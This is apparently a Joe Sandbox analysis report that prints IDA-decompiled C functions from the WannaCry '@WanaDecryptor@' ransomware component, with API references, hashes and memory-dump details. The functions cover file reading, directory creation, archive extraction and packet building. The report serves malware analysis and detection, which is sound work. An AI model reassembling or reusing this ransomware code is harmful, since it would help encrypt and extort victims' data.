                                  • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}











                                  0x004031a0
                                  0x004031a2
                                  0x004031a7
                                  0x004031ad
                                  0x004031ae
                                  0x004031bc
                                  0x004031c0
                                  0x004031c8
                                  0x004031ce
                                  0x004031d2
                                  0x004031da
                                  0x004031df
                                  0x004031e4
                                  0x004031ea
                                  0x004031f0
                                  0x004031f4
                                  0x004031fc
                                  0x00403201
                                  0x0040320c
                                  0x00403212
                                  0x00403217
                                  0x0040321f
                                  0x00403224
                                  0x0040322b
                                  0x00403233
                                  0x0040323e
                                  0x00403248

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                  • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                  • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                  • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#616#641#693
                                  • String ID:
                                  • API String ID: 1164084425-0
                                  • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                  • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}


















                                  0x00403af6
                                  0x00403af8
                                  0x00403afd
                                  0x00403afe
                                  0x00403b1d
                                  0x00403b21
                                  0x00403b26
                                  0x00403b48
                                  0x00403b5b
                                  0x00403b62
                                  0x00403b67
                                  0x00403b69
                                  0x00403b9b
                                  0x00403b9e
                                  0x00403ba2
                                  0x00403ba4
                                  0x00403bb2
                                  0x00403bbd
                                  0x00403bc1
                                  0x00403bc3
                                  0x00403bc5
                                  0x00403bd1
                                  0x00403bd3
                                  0x00403bd6
                                  0x00403bd8
                                  0x00000000
                                  0x00000000
                                  0x00403be7
                                  0x00403beb
                                  0x00403beb
                                  0x00403bec
                                  0x00403bee
                                  0x00403bf7
                                  0x00403bfb
                                  0x00403bfc
                                  0x00403c01
                                  0x00000000
                                  0x00000000
                                  0x00403c03
                                  0x00403c0c
                                  0x00403c10
                                  0x00403c11
                                  0x00403c16
                                  0x00000000
                                  0x00000000
                                  0x00403c35
                                  0x00403c39
                                  0x00403c3a
                                  0x00403c48
                                  0x00403c4d
                                  0x00403c4f
                                  0x00403c51
                                  0x00403c51
                                  0x00403c51
                                  0x00403c51
                                  0x00403c4f
                                  0x00000000
                                  0x00403c18
                                  0x00403c21
                                  0x00403c25
                                  0x00403c26
                                  0x00403bf7
                                  0x00403bfb
                                  0x00403bfc
                                  0x00403c01
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403c01
                                  0x00403bee
                                  0x00403c55
                                  0x00403c55
                                  0x00403c59
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403c59
                                  0x00403c60
                                  0x00403c62
                                  0x00403c71
                                  0x00403c73
                                  0x00403c73
                                  0x00403c7f
                                  0x00403c8a
                                  0x00403c9a
                                  0x00403ca7
                                  0x00403b6b
                                  0x00403b72
                                  0x00403b7d
                                  0x00403b83
                                  0x00403b8d
                                  0x00403b9a
                                  0x00403b9a
                                  0x00403b28
                                  0x00403b33
                                  0x00403b40
                                  0x00403b40

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fopen
                                  • String ID: f.wnry
                                  • API String ID: 1432627528-2448388194
                                  • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                  • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0);
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}













                                  0x0040b6a8
                                  0x0040b6b4
                                  0x0040b6c1
                                  0x0040b6ca
                                  0x0040b6cf
                                  0x0040b6d1
                                  0x0040b6d6
                                  0x0040b6f7
                                  0x0040b6ff
                                  0x0040b709
                                  0x0040b70e
                                  0x0040b712
                                  0x0040b717
                                  0x0040b726
                                  0x0040b72a
                                  0x0040b72c
                                  0x0040b733
                                  0x0040b74e
                                  0x0040b75d
                                  0x0040b762
                                  0x0040b765
                                  0x0040b766
                                  0x0040b72c
                                  0x0040b76b
                                  0x0040b77f
                                  0x0040b71c
                                  0x0040b725
                                  0x0040b725
                                  0x0040b6d8
                                  0x0040b6d9
                                  0x0040b6eb
                                  0x0040b6eb

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                  • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeleteDirectoryFile
                                  • String ID: %s\%s
                                  • API String ID: 3195586388-4073750446
                                  • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                  • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}
























                                  0x0040d150
                                  0x0040d159
                                  0x0040d15b
                                  0x0040d15d
                                  0x0040d163
                                  0x0040d168
                                  0x0040d16b
                                  0x0040d170
                                  0x0040d176
                                  0x0040d17a
                                  0x0040d17f
                                  0x0040d183
                                  0x0040d185
                                  0x0040d185
                                  0x0040d18a
                                  0x0040d18e
                                  0x0040d192
                                  0x0040d193
                                  0x0040d185
                                  0x0040d197
                                  0x0040d19e
                                  0x0040d1a4
                                  0x0040d1a6
                                  0x0040d1b7
                                  0x0040d1b7
                                  0x0040d1b9
                                  0x0040d1bb
                                  0x0040d1bc
                                  0x0040d1c0
                                  0x0040d1c7
                                  0x0040d1d6
                                  0x0040d1e1
                                  0x0040d1e5
                                  0x0040d1e9
                                  0x0040d1ea
                                  0x0040d1ef
                                  0x0040d1f3
                                  0x0040d1f8
                                  0x0040d201
                                  0x0040d215
                                  0x0040d21a
                                  0x0040d297
                                  0x0040d2a1
                                  0x0040d21c
                                  0x0040d21f
                                  0x0040d22a
                                  0x0040d233
                                  0x0040d234
                                  0x0040d237
                                  0x0040d244
                                  0x0040d292
                                  0x00000000
                                  0x0040d24d
                                  0x0040d24f
                                  0x0040d282
                                  0x0040d28b
                                  0x0040d251
                                  0x0040d257
                                  0x0040d25d
                                  0x0040d25e
                                  0x0040d25f
                                  0x0040d268
                                  0x00000000
                                  0x0040d26a
                                  0x0040d27d
                                  0x0040d27d
                                  0x0040d268
                                  0x0040d24f
                                  0x0040d244

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                  • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1);
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}









                                  0x004108a2
                                  0x004108ab
                                  0x004108c8
                                  0x004108cc
                                  0x004108ce
                                  0x004108d3
                                  0x004108d9
                                  0x004108dd
                                  0x00410915
                                  0x00410919
                                  0x00000000
                                  0x004108df
                                  0x004108e2
                                  0x00410938
                                  0x00410938
                                  0x0041093a
                                  0x00410945
                                  0x00410947
                                  0x00410980
                                  0x00410985
                                  0x00410988
                                  0x0041098b
                                  0x0041098e
                                  0x00410992
                                  0x00410999
                                  0x004109a8
                                  0x004109a8
                                  0x004109b4
                                  0x004109bb
                                  0x0041094e
                                  0x00410956
                                  0x0041095d
                                  0x00410962
                                  0x00410965
                                  0x00410969
                                  0x0041096d
                                  0x00410970
                                  0x00410973
                                  0x0041097b
                                  0x0041097b
                                  0x004108e4
                                  0x00410901
                                  0x00410906
                                  0x00410920
                                  0x00410925
                                  0x0041092c
                                  0x00410935
                                  0x00000000
                                  0x00410908
                                  0x00410908
                                  0x00410914
                                  0x00410914
                                  0x00410906
                                  0x004108e2
                                  0x004108b7
                                  0x004108be
                                  0x004108c7
                                  0x004108c7

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                  • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Pointer$#823Create
                                  • String ID:
                                  • API String ID: 3407337251-0
                                  • Opcode ID: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
                                  • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                  • Opcode Fuzzy Hash: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
                                  • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32);
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520);
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						return CreateDirectoryA( &_v520, 0);
					}
				}
			}
























                                  0x00412250
                                  0x00412257
                                  0x00412261
                                  0x00412264
                                  0x0041226d
                                  0x00412272
                                  0x00412272
                                  0x0041226d
                                  0x00412278
                                  0x0041227f
                                  0x00412284
                                  0x0041235a
                                  0x0041235a
                                  0x0041228a
                                  0x0041228a
                                  0x0041228c
                                  0x0041228e
                                  0x00412291
                                  0x00412298
                                  0x00412298
                                  0x0041229a
                                  0x0041229d
                                  0x0041229e
                                  0x004122a6
                                  0x004122aa
                                  0x004122ac
                                  0x004122b7
                                  0x004122ba
                                  0x004122c1
                                  0x004122c1
                                  0x004122c1
                                  0x004122c3
                                  0x004122d4
                                  0x004122d9
                                  0x004122d9
                                  0x004122de
                                  0x004122e3
                                  0x004122f0
                                  0x004122f2
                                  0x004122f8
                                  0x004122fc
                                  0x00412306
                                  0x00412306
                                  0x00412306
                                  0x00412306
                                  0x00412313
                                  0x00412315
                                  0x00412319
                                  0x0041231b
                                  0x00412322
                                  0x00412327
                                  0x0041232a
                                  0x00412336
                                  0x00412338
                                  0x00412343
                                  0x00000000
                                  0x00412345
                                  0x00000000
                                  0x0041234c
                                  0x00412343

                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesCreateDirectoryFile
                                  • String ID:
                                  • API String ID: 3401506121-0
                                  • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                  • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
